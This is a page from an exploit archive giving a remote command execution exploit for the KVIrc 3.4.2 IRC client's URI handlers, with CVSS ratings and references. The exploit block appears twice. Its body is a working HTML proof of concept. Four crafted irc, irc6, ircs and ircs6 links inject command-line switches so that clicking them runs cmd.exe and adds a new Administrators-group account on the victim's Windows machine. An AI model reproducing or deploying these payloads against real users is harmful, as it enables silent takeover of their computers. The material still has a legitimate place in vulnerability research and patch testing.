KVIrc 3.4.2 Shiny (uri handler) remote command execution exploit

2008.11.23
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- KVIrc 3.4.2 Shiny (uri handler) remote command execution exploit by Nine:Situations:Group::strawdog Tested against IE8beta/WINxpsp3 software site: http://www.kvirc.net/?lang=en description: "KVIrc is a Multilanguage, graphical IRC-Client for Windows, Linux, Unix and Mac OS.[..]" A command line parsing vulnerability exists (or I should say persists...: http://secunia.com/advisories/25740, fixed or not?) which can be exploited by passing the '"' char followed by command line switches to 'irc:///', 'irc6:///', 'ircs:///' and 'ircs6:///' urls, ex. this shows the argument list: irc:///"%20--help%20" The most interesting one is the -e switch followed by 'run' command, this runs calc.exe: irc:///"%20--nosplash%20-e%20"run%20calc"%20" The following links add a new user on target with admin privileges --> <html> <body> <a href='irc:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>Heaven and Earth are impartial</a><br> <a href='irc6:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They see the ten thousand things as straw dogs</a><br> <a href='ircs:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>The wise are impartial</a><br> <a href='ircs6:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They see the people as straw dogs</a><br> </body> </html> url: <!-- KVIrc 3.4.2 Shiny (uri handler) remote command execution exploit by Nine:Situations:Group::strawdog Tested against IE8beta/WINxpsp3 software site: http://www.kvirc.net/?lang=en description: "KVIrc is a Multilanguage, graphical IRC-Client for Windows, Linux, Unix and Mac OS.[..]" A command line parsing vulnerability exists (or I should say persists...: http://secunia.com/advisories/25740, fixed or not?) which can be exploited by passing the '"' char followed by command line switches to 'irc:///', 'irc6:///', 'ircs:///' and 'ircs6:///' urls, ex. this shows the argument list: irc:///"%20--help%20" The most interesting one is the -e switch followed by 'run' command, this runs calc.exe: irc:///"%20--nosplash%20-e%20"run%20calc"%20" The following links add a new user on target with admin privileges --> <html> <body> <a href='irc:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>Heaven and Earth are impartial</a><br> <a href='irc6:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They see the ten thousand things as straw dogs</a><br> <a href='ircs:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>The wise are impartial</a><br> <a href='ircs6:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They see the people as straw dogs</a><br> </body> </html> original url: http://retrogod.altervista.org/kvirc_342_cmd.html

References:

http://xforce.iss.net/xforce/xfdb/46779
http://www.securityfocus.com/bid/32410
http://www.securityfocus.com/archive/1/archive/1/498557/100/0/threaded
http://www.milw0rm.com/exploits/7181
http://retrogod.altervista.org/kvirc_342_cmd.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top